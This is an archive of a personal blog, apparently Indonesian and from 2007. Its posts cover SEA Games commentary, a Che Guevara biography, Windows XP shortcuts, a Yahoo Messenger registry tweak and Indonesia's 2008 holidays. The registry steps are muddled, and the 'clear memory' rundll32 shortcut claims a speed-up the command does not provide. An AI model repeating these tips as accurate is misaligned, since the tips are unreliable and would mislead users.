Tapi beberapa SEA Games terakhir olahraga kita begitu memprihatinkan, kita lihat saja SEA Games ke 24 yang diadakan di Thailand sekarang ini, makin memperlihatkan betapa memprihatinkannya olahraga di negara kita. Diawal-awal perolehan medali begitu terseok-seok seperti anak bayi yang baru belajar jalan, bahkan dengan Vietnam yang dulunya tidak ada apa-apanya dibanding atlet-atlet kita, mereka sudah jauh lebih banyak perolehan mendalinya.
Dimanakah letak kesalahan dalam pembinaan atlet-atlet kita, manajemenkah atau bonus yang diberikan kurang besar atau bisa jadi para atlit berpikir jika mereka mendapatkan bonus takut dipotong sana-sini sehingga mereka menjadi bimbang? tidak sedikit cabang-cabang olahraga yang mengirim atlitnya untuk berlatih ke luar negeri. Kita contohkan sepakbola, mereka berlatih tanding dengan tim-tim dari luar negara kita, tapi apa hasilnya, bahkan hasil yang didapat jauh dari apa yang diharapkan.
Dari hasil yang didapat sekarang ini semoga KONI yang memayungi cabang-cabang olahraga di negara kita tercinta, memperhatikan lebih baik lagi sehingga hasil yang didapat pun lebih baik lagi. Para atlit kita bukan hanya membutuhkan latihan fisik saja, tapi mental juara mereka juga harus dilatih dengan melibatkan psikiater sehingga dalam bertanding mereka tidak gugup atau demam lapangan. Dan ada baiknya juga KONI membersihkan pengurus-pengurus cabang olahraga kita yang masih "nakal", masa iya sebuah cabang olahraga dengan peminat paling besar di pimpin oleh seseorang dari balik jeruji besi, Apa Kata Dunia?
Walau bagaimanapun mari kita sama-sama berdoa semoga atlit-atlit kita bisa berjaya dimasa depan.

13 December 2007

Yahoo!Messenger Multi ID

do you know that is moment chating use yahoo! messengger can use more than 1 id. . . . this the trick. . . . without software or tools addition. . . .

  1. click start > run… > cmd
  2. choose tree hkey_current_user > software > yahoo > fence > test
  3. in panel right side, click right > new > dword value
  4. give name plural in key and 1 in value

07 December 2007

Yahoo!Messenger Unique ID

link to make id number

under these is tricks make id number


use navigation button likes within reason you use button in handphone by using mouse



choose no i don't




skip




find and choose sign in




input number you want and then submit, then password contents etc like you make id




verification code input




congratulation you have made id number. . . .

22 November 2007

Biografi Che Guevara

Che Guevara: His Life and Times
Che Guevara was born Ernesto Guevara de la Serna on June 14, 1928, to an aristocratic family in Rosario, Argentina. Years later, Cuban revolutionaries in Mexico gave him the nickname "Che," a word from the Guaraní Indians that is commonly used in Argentina and can be roughly translated as "hey you." In 1959, after the triumph of the Cuban Revolution, he became a Cuban citizen and legally adopted Che as part of his name. Che's family held leftist ideas, including opposition to the institutional power of the church and support for the Republicans in the Spanish Civil War. Che's mother, Celia de la Serna, had a particularly important influence on the formation of his social conscience. In 1948 he entered the University of Buenos Aires to study medicine. Although Che eventually finished medical school, he was never seriously committed to the profession. Almost a decade later, after landing in Cuba with Fidel Castro to launch an insurrectionary war against the Fulgencio Batista dictatorship, when forced to choose he decided to carry bullets rather than a first-aid kit.In his early twenties, Che made two motorcycle trips during which he directly observed the lives of workers and peasants for the first time. In 1950 he took a fourthousand mile moped trip alone through northern Argentina. During 1951 and 1952 Che journeyed through South America on a 500cc Norton motorcycle nicknamed "La Poderosa" (The Powerful One) with Alberto Granado, a radical doctor and leprologist. 3 These trips introduced him to the political and economic realities of Latin America and the poverty and exploitation under which the majority of the Latin American people lived. It was a consciousness-raising experience that ultimately changed the direction his life would take.
In 1953 Che began a third trip through Latin America. In Bolivia he observed the mobilization of workers and the implementation of agrarian reform following the popular 1952 revolution. He then continued on to Guatemala, where he lived until a United States-backed coup overthrew the revolutionary government of Jacobo Arbenz in 1954. He gleaned important lessons from this experience, which would strongly influence his later ideology. He believed that it was necessary to destroy completely the political and military forces of the old system, something Arbenz had not done.
Under Che's leadership, the Cuban revolutionaries eradicated all vestiges of Batistas's government and successfully maintained their hold on power. In contrast, the Sandinista guerrillas who triumphed in Nicaragua in 1979 did not do this and subsequently faced a drawn-out war against counterrevolutionary forces that eventually contributed to their fall from power. If Arbenz had had more faith in the Indians, peasants, and workers, Che contended, and had been willing to organize them into armed militias, the revolutionary government would have maintained power. The role of the United States in the coup in 1954 also turned Che into a dedicated fighter against United States imperialism in Latin America. After the overthrow of Arbenz's revolutionary government in Guatemala, Che escaped to Mexico, where he met Fidel Castro, who was planning an invasion of his native Cuba. In Mexico Che began to study Marxism and became an ideological communist. Hilda Gadea, a political exile from Peru whom Che married, had a particularly strong influence on the development of his ideology. She introduced Che to many new political and intellectual ideas, including those of José Carlos Mariátegui,the founder of Latin American Marxist thought. These ideological influences had a dramatic impact on his later development as a Marxist thinker. 4 Che joined Fidel and his small guerrilla army in 1956 when they traveled to Cuba's eastern region to begin a guerrilla war against the Batista regime. Che, chosen because of his medical skills, was the only non-Cuban included in this group. For two years Che fought alongside Fidel in the Sierra Maestra mountains of Cuba, eventually rising to the rank of Rebel Army commander. During this time he solidified the revolutionary ideologies and military strategies that would later form the basis for Guerrilla Warfare.
After the triumph of the Cuban Revolution on January 1, 1959, Che assumed a series of positions in the new government. He was first named to head the national bank, a job for which he had no training or expertise. In 1961 he assumed the post of minister of industry. He led a Cuban delegation to the InterAmerican Economic and Social Council sponsored by the Organization of American States in Uruguay, where he strongly denounced the motives of John F. Kennedy's Alliance for Progress program.5 The Alliance for Progress was a ten-year development program that sought, through mild social and economic reforms, to prevent in other Latin American countries radical social revolutions such as that in Cuba. In fact, Che's Guerrilla Warfare probably led Kennedy to his conclusion that those who make peaceful change impossible make violent revolution inevitable. Increasingly, Che traveled internationally as an ambassador for Cuba. He left Cuba in 1965 to spread the revolutionary struggle. He first surfaced in Africa fighting in the Congo and then returned to Latin America with the intent of sparking a hemisphere-wide guerrilla uprising. Che became increasingly vocal in denouncing United States imperialism. He believed that people throughout Latin America were ready for a revolutionary uprising. In his last public statement, a message to the Organization of Solidarity with the Peoples of Asia, Africa, and Latin America (ospaaal, also known as the Tricontinental), he spoke of creating "two, three, or many Vietnams," which would strike a deadly blow against imperialism. Much like Simón Bolívar and José Martí before him, Che was a true intemation alist who believed that the destiny of Latin America was singular and unified. National borders simply served to divide people in their struggle to achieve a more just social order. Che chose Bolivia as the place to launch this pan-American war, more because of its strategic geographic location than out of concern for local conditions. Despite the presence of a radical Marxist urban labor movement possibly sympathetic to his political ideologies, he chose to position his guerrilla army in Bolivia's isolated eastern jungle, which was more appropriate to his military strategy.
Emphasizing geography over subjective political ideologies turned out to be a costly mistake. Che alienated the Bolivian Communist Party based in La Paz, depriving him of a critically important base of support for his efforts. Moreover, the Guaraní Indians living in the sparsely populated eastern jungle had received land in a government-sponsored agrarian reform program and felt little animosity toward the Bolivian army (members of which were often recruited from their own ranks). The local population had few reasons to defend a foreign guerrilla army that was culturally different, did not speak their language, and did not reflect local concerns. Ironically, in a short essay from 1963 entitled "Guerrilla Warfare: A Method," Che emphasized the importance of popular support to a guerrilla struggle. Without this backing, a disaster was inevitable. For several months, Che engaged in skirmishes with the Bolivian military but was always on the defensive. On October 8, 1967, the army captured Che and his few remaining guerrilla fighters near the small village of La Higuera. The next day they executed him and publicly displayed his body. In death he looked like a sacrificed Christ, which helped create an image of Che as a martyr and prophet. A popular cult grew around "Saint Ernesto of La Higuera," and locals placed his portrait in their houses alongside Catholic images. The army buried his body in a mass grave, where it remained until it was repatriated to Cuba in 1997 with a hero's welcome. Since his death, Che's supporters have celebrated October 8 as the Day of the Heroic Guerrilla. 6 Like Eva Perón, Che became a more potent symbol in death than he had ever been in life. Che's death ushered in a year of violent repression of political opposition movements around the world. In April and June of 1968 assassins killed civil rights leader Martin Luther King Jr. and presidential candidate Robert Kennedy in the United States. During May student and worker protests paralyzed Paris, France. In August Chicago police attacked Vietnam War protestors at the Democratic National Convention. The Mexican army shot an estimated three hundred protestors in October at the Plaza of Three Cultures in Mexico City. Che's death did not mean the end of revolutionary actions, and it only helped to polarize further an already tense global political situation.

Guerrilla Warfare
Guerrilla Warfare is an extended essay that runs well over one hundred pages. Che published it in May of 1960, about a year after the triumph of the Cuban Revolution. It is divided into three chapters that outline the general principles of guerrilla warfare, describe the nature of a guerrilla group, and explain the strategies of a guerrilla army. A manual setting forth his ideas on conducting a guerrilla war to overthrow a dictatorship and implement a new and more just social order, it is part theory, part practical information (though over time much of this information has become outdated), and part a political tract designed to press the Left into action. He speaks directly from his experience helping Fidel and Raul Castro organize their guerrilla army in Cuba. At times he considers this history to be normative, yet at other points he indicates that Cuba's experience is only an outline; other guerrilla forces would have to discover paths suitable to their own situations. Generally, though, Che analyzed the Cuban Revolution in order to extract general laws and develop a theory of guerrilla warfare. Many historians see the Cuban Revolution as a watershed event in twentieth-century Latin American history, and Che lays out what he believes is the historical significance of their guerrilla victory. First, it demonstrated that people can organize themselves into a small guerrilla army and overthrow a large, powerful, established regime. Second, popular movements do not have to wait for the proper economic conditions before organizing a revolutionary war; the insurrectionary guerrilla force can create them. Third, Latin American revolutionary struggles should, according to Che, be based in a rural, peasant population These three concepts underlie this entire work, and it is worth examining them in more detail. In order to understand the theoretical and political implications of Che's major points, it is important to understand the international context of the Cuban Revolution. Although the United States consistently blamed leftist uprisings in Latin America on the Soviet Union's penetration of ''its" hemisphere, the Cuban Revolution did not begin as a communist movement. In fact, the Cuban Communist Party denounced the guerrillas as "adventuresome." Since the 1930s, communist parties in Latin America generally had pursued a gradualist "Popular Front" strategy in which they sought slowly to build a base of support within established political structures. They fostered peaceful relations with existing moderate governments, even to the point of accepting positions in those governments. Che, on the other hand, believed that a vanguardist group with strong leadership could grab power. He became highly critical of bureaucratic Soviet communism, which had lost its revolutionary fervor. Che believed in a revolutionary movement that responded to local conditions, not the geopolitical concerns of a distant empire. Related to this strategic difference with the communists are two important ideological distinctions. Karl Marx believed that history moved through a series of stages, from a feudalistic stage through capitalism to the final perfect stage of communism. Although in the 1917 Russian Revolution Vladimir Lenin had demonstrated that feudalistic societies could move immediately to the communist stage, orthodox Marxists in Latin America still believed that an industrialized capitalist economy was essential before workers would gain the necessary class consciousness to break loose from their chains and overthrow an oppressive system. Che, however, following in the footsteps of earlier Latin American Marxist thinkers such as José Carlos Mariátegui, belived that subjective conditions, including the role of human consciousness, were more important for creating a revolutionary situation than the objective economic situation. 7 To spur the revolution a dedicated cadre must engage in the political education of the masses rather than wait for a highly developed capitalist economy to collapse due to its internal contradictions. "The duty of every revolutionary is to make the revolution," Fidel Castro later stated. "It is known that the revolution will triumph in America and throughout the world, but it is not for revolutionaries to sit in the doorways of their houses waiting for the corpse of imperialism to pass by." 8 Mariátegui, Che, and other Latin American Marxists also broke with orthodox thought over the role of the peasantry in a revolutionary movement. In the Communist Manifesto, Marx wrote that the peasantry was "not revolutionary, but conservative." He proceeded to note that "nay more, they are reactionary, for they try to roll back the wheel of history."9 Latin America, however, largely lacked an urban, industrialized working class, which orthodox Marxists believed would lead a socialist revolution. Instead, in the 1950s landless agricultural workers comprised much of Latin America's population. Although Marx thought that peasants were inactive, passive like a "sack of potatoes,'' Che believed they could head a revolutionary movement.10 Che believed that the experience of the Cuban Revolution demonstrated that peasants understood the nature of their exploitation and were able to achieve the class consciousness necessary to engage in revolutionary action. As Eric Wolf demonstrated in Peasant Wars of the Twentieth Century, successful revolutionary movements in Mexico, Russia, China, Vietnam, and Algeria as well as in Cuba have been rural based.11 The most controversial aspect of Che's thought, the one that many people believe led to his eventual defeat and execution in Bolivia, was his belief that a guerrilla force could create the objective conditions necessary for a guerrilla war. Previous revolutionary theorists had argued that certain political and economic conditions were necessary for a successful struggle. In what became known as his foco theory of guerrilla warfare, Che argued that a small guerrilla army operating in the countryside could spark a revolution that would then spread to the cities. Only a handful of guerrillas in each country was necessary to begin a process that would transform Latin America. This led him in Guerrilla Warfare to emphasize the importance of a proper geographic setting for an armed struggle. A jungle environment that provided good cover for the guerrillas was more important than the ideological preparation of a large civilian base of support. Che's foco theory subsequently was discredited in Latin America; those who attempted to implement it failed miserably.In Peru in 1965, Héctor Béjar's insurrectionary foco met defeat, and two years later Che himself was killed while attempting to follow this strategy in Bolivia. 12 Many people have criticized Che for overemphasizing the role of armed straggle in a revolutionary movement and have pointed out that, although a relatively small guerrilla force overthrew Batista in Cuba, this came only after years of leftist political agitations and rising worker expectations.13 Because of his role in guerrilla battles in the mountains, he either was not aware of or discounted a coalition of urban student and worker movements that served to undermine the Batista regime. A lengthy debate has also ensued suggesting that Che misidentified the rural masses of Cuba as a peasant population. They worked primarily as wage laborers on large plantations and therefore comprised a rural proletariat that had developed a class consciousness unlike that which a more traditional peasantry could be expected to develop.14 Many of the ideas in Guerrilla Warfare were not new; what Che did contribute to revolutionary theory was a creative adaptation of existing notions to the Latin American context. He did not realize, however, how unique the Cuban situation was and his defeat in Bolivia was a result of a failure to reinterpret what he had learned for a new and different situation. Subsequent guerrilla armies learned from the fiasco in Bolivia to reinterpret Che's theories for their own local reality and never to apply mechanically what had worked in one situation to another. Ethnicity and New Guerrilla Struggles in Latin America Che grew up in an urban milieu in Argentina in which he was not constantly and directly exposed to the daily battles that Latin America's large rural Indigenous and peasant population faced. He encountered this rural reality as an adult traveling through Latin America and in the Sierra Maestra of Cuba. He interpreted it through an outsiders indigenista perspective that betrayed sympathy for Indian and peasant causes, but he was not able to internalize their struggles or analyze the world from an Indigenous person's point of view. On his motorcycle trip through South America, Che visited the Inca ruins at Machu Picchu in the Peruvian highlands. He was impressed with the ruins and Inca history, he read literature critical of the social and economic marginalization that Indians faced, and he observed the misery and exploitation to which the Inca descendants were subjected. Still, he never seriously considered that their ethnic identity could lead to a type of consciousness that would result in a movement with revolutionary implications. Particularly in countries with large rural Indigenous populations such as Bolivia and Ecuador, ethnicbased movements have gained a great deal of strength over the last ten to twenty years. 15 Although not organized as guerrilla armies, Indians have been increasingly successful at gaining political space in civil society while still being fundamentally concerned with the same issues of economic inequality and injustice that motivated Che's campaigns. Che maintained in Guerrilla Warfare that insurgent groups should not turn to armed struggle until all peaceful means for political change had been exhausted, a point in time that is open to interpretation. Che defined this process primarily in electoral terms. These new ethnic movements, however, have largely eschewed electoral politics in favor of using strikes, marches, and other tools of direct action that the urban Marxist Left had perfected some fifty years earlier. As James Petras has observed, it is within these rural-based movements that the largest potential for revolutionary action currently exists in Latin America.16 A primary example of this trend is in Chiapas, Mexico, where the Zapatista guerrillas' dramatic armed uprising on New Year's Day 1994 grabbed international attention.17 In a sense, this insurrection synthesized many of the issues related to guerrilla warfare as they have developed since the triumph of the Cuban Revolution. Except for the symbolic representation of their media-sawy, urban-raised international spokesperson Subcomandante Marcos (himself almost a legendary Che-type figure), this was undisputably a locally grown revolt. It met all of the primary conditions that Che laid out for a successful guerrilla war. Chiapas's mountainous terrain created a type of ground cover that Che would have found ideal for waging a guerrilla war. After centuries of exploitation, the local Maya Indians had
attained a high degree of consciousness as to the nature of their political situation and the necessity for change. As a result, most of the guerrillas were from that area and thus had extensive and immediate knowledge of the local human and physical geography. They enjoyed deep support from the local civilian population. Che could not have asked for more ideal conditions. Although the Zapatista struggle began as a guerrilla battle, they fought for only eleven days before engaging in peace negotiations with the Mexican government. Like other ethnic struggles, their concerns were fundamentally political rather than military and the Zapatistas and their supporters more often engaged in peaceful direct actions, such as marches, than armed engagements. The Zapatista uprising in Mexico adds ethnic dimensions to the guerrilla struggle that are largely missing in Ches ideological constructions. This extends beyond the obvious ethnic Maya dress and language of the majority of the Zapatista combatants. More significant are the conceptual underpinnings of the movement. Specifically, the Zapatistas have championed the demand for land, not only as an economic commodity but as a territorial component of their culture. They seek to gain political space in Mexican society that they can enter with their complete ethnic identities and concerns intact. Their struggle reflects Mexican Revolutionary war hero Emiliano Zapata's slogan tierra y libertad, "land and liberty." Through their grounding in a long history of land and ethnic struggles, they stand poised to carry Ches theories of guerrilla warfare into the twenty-first century. What has not changed in Mexico nor throughout Latin America since Che wrote Guerrilla Warfare in 1960 is the political, social, and economic inequalities that gave rise to revolutionary movements for social justice. In fact, many people throughout the hemisphere were worse off in the 1990s than in the 1960s. As long as these fundamental structural inequalities persist, Ernesto "Che" Guevara will continue to live in the hearts and minds of those who pursue a more fair and just social order.


Download Disini untuk lebih lengkapnya....

14 November 2007

Cara Download Dari Youtube.com





cara download film dari youtube.com dan site sejenisnya....
gw dah coba beberapa cara untuk men download film dari youtube.com dan sejenisnya, mulai dari cari-cari di cache nya Mozilla FireFox sampai menggunakan software.... hanya satu cara saja yang menurut gw paling efektif dan mudah.... yaitu menggunakan Add-Ons nya Mozilla FireFox.... nama Add-Ons nya adalah DownloadHelper hanya tinggal klik di link yang dihasilkan oleh DownloadHelper anda sudah mendownload film yang anda maksud...

selamat mencoba....

List of the keyboard shortcuts that are available in Windows XP

General keyboard shortcuts
• CTRL+C (Copy)
• CTRL+X (Cut)
• CTRL+V (Paste)
• CTRL+Z (Undo)
• DELETE (Delete)
• SHIFT+DELETE (Delete the selected item permanently without placing the item in the Recycle Bin)
• CTRL while dragging an item (Copy the selected item)
• CTRL+SHIFT while dragging an item (Create a shortcut to the selected item)
• F2 key (Rename the selected item)
• CTRL+RIGHT ARROW (Move the insertion point to the beginning of the next word)
• CTRL+LEFT ARROW (Move the insertion point to the beginning of the previous word)
• CTRL+DOWN ARROW (Move the insertion point to the beginning of the next paragraph)
• CTRL+UP ARROW (Move the insertion point to the beginning of the previous paragraph)
• CTRL+SHIFT with any of the arrow keys (Highlight a block of text)
• SHIFT with any of the arrow keys (Select more than one item in a window or on the desktop, or select text in a document)
• CTRL+A (Select all)
• F3 key (Search for a file or a folder)
• ALT+ENTER (View the properties for the selected item)
• ALT+F4 (Close the active item, or quit the active program)
• ALT+ENTER (Display the properties of the selected object)
• ALT+SPACEBAR (Open the shortcut menu for the active window)
• CTRL+F4 (Close the active document in programs that enable you to have multiple documents open simultaneously)
• ALT+TAB (Switch between the open items)
• ALT+ESC (Cycle through items in the order that they had been opened)
• F6 key (Cycle through the screen elements in a window or on the desktop)
• F4 key (Display the Address bar list in My Computer or Windows Explorer)
• SHIFT+F10 (Display the shortcut menu for the selected item)
• ALT+SPACEBAR (Display the System menu for the active window)
• CTRL+ESC (Display the Start menu)
• ALT+Underlined letter in a menu name (Display the corresponding menu)
• Underlined letter in a command name on an open menu (Perform the corresponding command)
• F10 key (Activate the menu bar in the active program)
• RIGHT ARROW (Open the next menu to the right, or open a submenu)
• LEFT ARROW (Open the next menu to the left, or close a submenu)
• F5 key (Update the active window)
• BACKSPACE (View the folder one level up in My Computer or Windows Explorer)
• ESC (Cancel the current task)
• SHIFT when you insert a CD-ROM into the CD-ROM drive (Prevent the CD-ROM from automatically playing)
• CTRL+SHIFT+ESC (Open Task Manager)

Dialog box keyboard shortcuts
If you press SHIFT+F8 in extended selection list boxes, you enable extended selection mode. In this mode, you can use an arrow key to move a cursor without changing the selection. You can press CTRL+SPACEBAR or SHIFT+SPACEBAR to adjust the selection. To cancel extended selection mode, press SHIFT+F8 again. Extended selection mode cancels itself when you move the focus to another control.
• CTRL+TAB (Move forward through the tabs)
• CTRL+SHIFT+TAB (Move backward through the tabs)
• TAB (Move forward through the options)
• SHIFT+TAB (Move backward through the options)
• ALT+Underlined letter (Perform the corresponding command or select the corresponding option)
• ENTER (Perform the command for the active option or button)
• SPACEBAR (Select or clear the check box if the active option is a check box)
• Arrow keys (Select a button if the active option is a group of option buttons)
• F1 key (Display Help)
• F4 key (Display the items in the active list)
• BACKSPACE (Open a folder one level up if a folder is selected in the Save As or Open dialog box)

Microsoft natural keyboard shortcuts
• Windows Logo (Display or hide the Start menu)
• Windows Logo+BREAK (Display the System Properties dialog box)
• Windows Logo+D (Display the desktop)
• Windows Logo+M (Minimize all of the windows)
• Windows Logo+SHIFT+M (Restore the minimized windows)
• Windows Logo+E (Open My Computer)
• Windows Logo+F (Search for a file or a folder)
• CTRL+Windows Logo+F (Search for computers)
• Windows Logo+F1 (Display Windows Help)
• Windows Logo+ L (Lock the keyboard)
• Windows Logo+R (Open the Run dialog box)
• Windows Logo+U (Open Utility Manager)

Windows Explorer keyboard shortcuts

• END (Display the bottom of the active window)
• HOME (Display the top of the active window)
• NUM LOCK+Asterisk sign (*) (Display all of the subfolders that are under the selected folder)
• NUM LOCK+Plus sign (+) (Display the contents of the selected folder)
• NUM LOCK+Minus sign (-) (Collapse the selected folder)
• LEFT ARROW (Collapse the current selection if it is expanded, or select the parent folder)
• RIGHT ARROW (Display the current selection if it is collapsed, or select the first subfolder)

Shortcut keys for Character Map
After you double-click a character on the grid of characters, you can move through the grid by using the keyboard shortcuts:
• RIGHT ARROW (Move to the right or to the beginning of the next line)
• LEFT ARROW (Move to the left or to the end of the previous line)
• UP ARROW (Move up one row)
• DOWN ARROW (Move down one row)
• PAGE UP (Move up one screen at a time)
• PAGE DOWN (Move down one screen at a time)
• HOME (Move to the beginning of the line)
• END (Move to the end of the line)
• CTRL+HOME (Move to the first character)
• CTRL+END (Move to the last character)
• SPACEBAR (Switch between Enlarged and Normal mode when a character is selected)
Microsoft Management Console (MMC) main window keyboard shortcuts
• CTRL+O (Open a saved console)
• CTRL+N (Open a new console)
• CTRL+S (Save the open console)
• CTRL+M (Add or remove a console item)
• CTRL+W (Open a new window)
• F5 key (Update the content of all console windows)
• ALT+SPACEBAR (Display the MMC window menu)
• ALT+F4 (Close the console)
• ALT+A (Display the Action menu)
• ALT+V (Display the View menu)
• ALT+F (Display the File menu)
• ALT+O (Display the Favorites menu)

MMC console window keyboard shortcuts
• CTRL+P (Print the current page or active pane)
• ALT+Minus sign (-) (Display the window menu for the active console window)
• SHIFT+F10 (Display the Action shortcut menu for the selected item)
• F1 key (Open the Help topic, if any, for the selected item)
• F5 key (Update the content of all console windows)
• CTRL+F10 (Maximize the active console window)
• CTRL+F5 (Restore the active console window)
• ALT+ENTER (Display the Properties dialog box, if any, for the selected item)
• F2 key (Rename the selected item)
• CTRL+F4 (Close the active console window. When a console has only one console window, this shortcut closes the console)

Remote desktop connection navigation
• CTRL+ALT+END (Open the Microsoft Windows NT Security dialog box)
• ALT+PAGE UP (Switch between programs from left to right)
• ALT+PAGE DOWN (Switch between programs from right to left)
• ALT+INSERT (Cycle through the programs in most recently used order)
• ALT+HOME (Display the Start menu)
• CTRL+ALT+BREAK (Switch the client computer between a window and a full screen)
• ALT+DELETE (Display the Windows menu)
• CTRL+ALT+Minus sign (-) (Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing ALT+PRINT SCREEN on a local computer.)
• CTRL+ALT+Plus sign (+) (Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PRINT SCREEN on a local computer.)

Microsoft Internet Explorer navigation
• CTRL+B (Open the Organize Favorites dialog box)
• CTRL+E (Open the Search bar)
• CTRL+F (Start the Find utility)
• CTRL+H (Open the History bar)
• CTRL+I (Open the Favorites bar)
• CTRL+L (Open the Open dialog box)
• CTRL+N (Start another instance of the browser with the same Web address)
• CTRL+O (Open the Open dialog box, the same as CTRL+L)
• CTRL+P (Open the Print dialog box)
• CTRL+R (Update the current Web page)
• CTRL+W (Close the current window)

How To Clear Your Memory Without Restarting

If you run a windows computer you’ll know like many others than after a while your system will in doubt start running slow. Most people will restart their computer to remove and idle processes. But if there’s a simpler way, why restart every time windows decides it doesn’t like you today?

1. Right click on an empty spot on your desktop and select New - Shortcut.

2. Type %windir%\system32\rundll32.exe advapi32.dll,ProcessIdleTasks in the box.

3. Click Next.

4. Give your shortcut a nice name like “Clear Memory”.

5. Click Finish and you’re done.

Now whenever your computer starts running slow click this shortcut to clear out your memory and get your computer running at a normal pace again

10 November 2007

Volume 12 Acoustic Bonus Disk



videonya hanya bisa diputar bila komputer anda sudah terinstall DivX Web Player

jika belum silahkan download disini

08 November 2007

Libur Nasional dan Cuti Bersama Tahun 2008

Libur Nasional dan Cuti Bersama pada 2008 sebanyak 23 Hari
KESRA--30 MEI: Surat Keputusan Bersama (SKB) tiga menteri mengenai penetapan hari libur nasional dan cuti
bersama tahun 2008, yang ditandatangani di Jakarta, Rabu, menyebutkan total 23 hari.
Hari libur nasional yang ditetapkan adalah sebagai berikut:

Tahun Baru Masehi (1 Januari/Selasa),
Tahun Baru 1429 Hijriyah (10 Januari/Kamis),
Tahun Baru Imlek 2559 (7 Februari/Kamis),
Hari Raya Nyepi Saka 1930 (7 Maret/Jumat),
Maulid Nabi Muhammad SAW (20 Maret/Kamis),
Wafat Isa al-Masih (21 Maret/Jumat),
Kenaikan Isa al-Masih (1 Mei/Kamis),
Hari Raya Waisak 2552 (20 Mei/Selasa),
Isra' Mi'raj (30 Juli/Rabu),
Hari Kemerdekaan RI (18 Agustus/Senin) yang diperingati pada 17 Agustus (Minggu),
Idul Fitri 1 Syawal 1428 H (1-2 Oktober/Rabu-Kamis),
Idul Adha 1429 H (8 Desember/Senin),
Hari Raya Natal (25 Desember/Kamis),
Tahun Baru 1430 Hijriah (29 Desember/Senin).
Sementara cuti bersama ditetapkan pada;
11 Januari (Jumat) menyambung hari libur Tahun Baru 1429H (11 Januari/Kamis),
8 Februari (Jumat) setelah hari libur Imlek (7 Februari/Kamis),
2 Mei (Jumat) cuti bersama kenaikan Isa al-Masih 1 Mei,
19 Mei (Senin) sebelum hari Waisak,
29-30 September dan 3 Oktober (Senin, Selasa, dan Jumat) cuti bersama Idul Fitri,
26 Desember (Jumat) menyambung Libur Natal.

SKB itu sendiri ditandatangani di kantor Kementrian Koordinator bidang Kesejahteraan Rakyat oleh Menteri Pendayaan
Aparatur Negara Taufik Effendi, Menteri Agama Maftuh Basyumi, dan Menteri Tenaga Kerja dan Transmigrasi yang
diwakili Sekjen Depnakertrans. Menko Kesra Aburizal Bakrie menyaksikan penandatangan tersebut.
Keputusan memberikan total 23 hari libur nasional dan cuti bersama, menurut Menko Kesra Aburizal Bakrie,
"Mempertimbangkan efektifitas dan efisiensi nasional, selain juga untuk juga pertimbangkan agar karyawan swasta dan
guru tidak bolos setelah hari libur nasional."
Jumlah libur dan cuti bersama tahun 2008 ini lebih banyak daripada tahun 2007, karena pada tahun 2007 hanya
terdapat 13 hari libur nasional dan 6 hari cuti bersama, sehingga keseluruhan hanya 19 hari.

Sumber http://www.menkokesra.go.id

My ImageUpload



akhirnya jadi juga punya ImageUpload sendiri... walaupun gratisan... hehehehe
memang jauh dari sempurna seh... tapi... lumayanlah...
mudah-mudahan dalam minggu ini bisa gw sempurnakan... doa'in ya....

02 November 2007

Steve Vai - Live At The Astoria London 3-3



videonya hanya bisa diputar bila komputer anda sudah terinstall DivX Web Player

jika belum silahkan download disini

Steve Vai - Live At The Astoria London 1-3



videonya hanya bisa diputar bila komputer anda sudah terinstall DivX Web Player

jika belum silahkan download disini